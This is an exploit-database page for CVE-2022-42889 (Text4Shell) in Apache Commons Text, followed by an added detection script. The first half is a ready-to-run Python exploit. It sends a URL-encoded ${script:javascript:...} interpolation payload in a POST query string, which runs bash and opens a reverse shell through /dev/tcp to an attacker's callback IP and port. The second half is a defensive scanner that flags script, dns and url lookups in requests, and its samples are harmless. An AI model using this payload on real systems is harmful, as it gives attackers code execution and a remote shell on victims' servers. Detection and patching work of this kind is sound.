Apache Commons Text 1.10.0 Remote Code Execution
Apache Commons Text 1.10.0 has a remote code execution vulnerability (Text4Shell): the attack uses a POST request and the script interpolator, and affects versions below 1.10.0. 2025-5-3 21:54:47 Author: cxsecurity.com


# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution (Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link: https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing from common GET-based payloads.

#!/usr/bin/env python3
import urllib.parse
import http.client
import sys


def usage():
    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
    sys.exit(1)


if len(sys.argv) != 4:
    usage()

target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]

raw_payload = (
    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}"  # modify the parameter according to your target

print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")

conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
    "Host": target_ip,
    "Content-Type": "application/json",
    "Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()
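The script above delivers its payload as a URL-encoded interpolation expression in the query string of a POST, so a detector that only inspects request bodies, or only GET requests, misses it. The following is an added detection example written for this page; it is not part of the advisory or of Apache Commons Text. It URL-decodes query string, body and headers (repeatedly, to catch double encoding) and flags any `${...}` expression that names one of the three lookups the 1.10.0 release removed from the default interpolator (script, dns, url). The function names and the sample requests are constructed for this example.

```python
"""Detect Text4Shell (CVE-2022-42889) interpolation probes in HTTP requests.

Added example, not part of the advisory or of Apache Commons Text.
All sample requests below are constructed for this example.
"""
import re
import urllib.parse

# Lookups that Apache Commons Text 1.10.0 dropped from the default
# interpolator because each can reach outside the process (run a script,
# resolve a DNS name, fetch a URL). Matching is case-insensitive because
# the interpolator lower-cases the lookup prefix before dispatching it.
DANGEROUS_LOOKUPS = ("script", "dns", "url")

# `${`, optional whitespace, one of the dangerous lookup names, `:`.
# Whitespace is tolerated for robustness; a false positive here is cheap.
_PATTERN = re.compile(
    r"\$\{\s*(" + "|".join(DANGEROUS_LOOKUPS) + r")\s*:",
    re.IGNORECASE,
)


def fully_decode(value, max_rounds=3):
    """URL-decode until the string stops changing (handles double encoding).

    The round count is capped so a pathological input cannot keep us
    looping; three rounds covers the double encoding seen in practice.
    """
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_interpolations(text):
    """Return the dangerous lookup names found in one (decoded) string."""
    return [m.group(1).lower() for m in _PATTERN.finditer(fully_decode(text))]


def scan_request(method, path, body="", headers=None):
    """Scan the query string, body and headers of a single request.

    Returns a list of (location, lookup) tuples; an empty list means clean.
    Every field is scanned regardless of method, because the exploit on
    this page puts its payload in the query string of a POST with an
    empty body.
    """
    findings = []
    query = urllib.parse.urlsplit(path).query
    for lookup in find_interpolations(query):
        findings.append(("query", lookup))
    for lookup in find_interpolations(body):
        findings.append(("body", lookup))
    for name, value in (headers or {}).items():
        for lookup in find_interpolations(value):
            findings.append((f"header:{name}", lookup))
    return findings


# Constructed sample requests (not real traffic). The first mirrors the
# delivery used by the exploit above: POST, payload in the query string,
# empty body; the script body is a harmless expression. The second is a
# double-URL-encoded dns lookup in a POST body. The last two are benign:
# ordinary text, and a plain `${amount}` variable with no lookup prefix.
SAMPLE_REQUESTS = [
    ("POST", "/?data=" + urllib.parse.quote("${script:javascript:1+1}"), "", {}),
    ("POST", "/api/greet", "%2524%257Bdns%253Aaddress%257Cexample.com%257D", {}),
    ("GET", "/?data=hello%20world", "", {"User-Agent": "Mozilla/5.0"}),
    ("GET", "/?price=${amount}", "", {}),
]


def scan_samples():
    """Run the scanner over the constructed samples; one result per request."""
    return [scan_request(*req) for req in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for req, result in zip(SAMPLE_REQUESTS, scan_samples()):
        print(req[0], req[1], "->", result or "clean")
```

Plug `scan_request` into a WAF rule or a log-replay job over access logs that record query strings; on the two constructed probes it reports `[("query", "script")]` and `[("body", "dns")]`, and nothing for the benign requests. A match is a strong signal on any host running Commons Text below 1.10.0, and the durable fix remains upgrading, since 1.10.0 leaves the script, dns and url lookups out of the default interpolator.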



 



Source: https://cxsecurity.com/issue/WLB-2025050011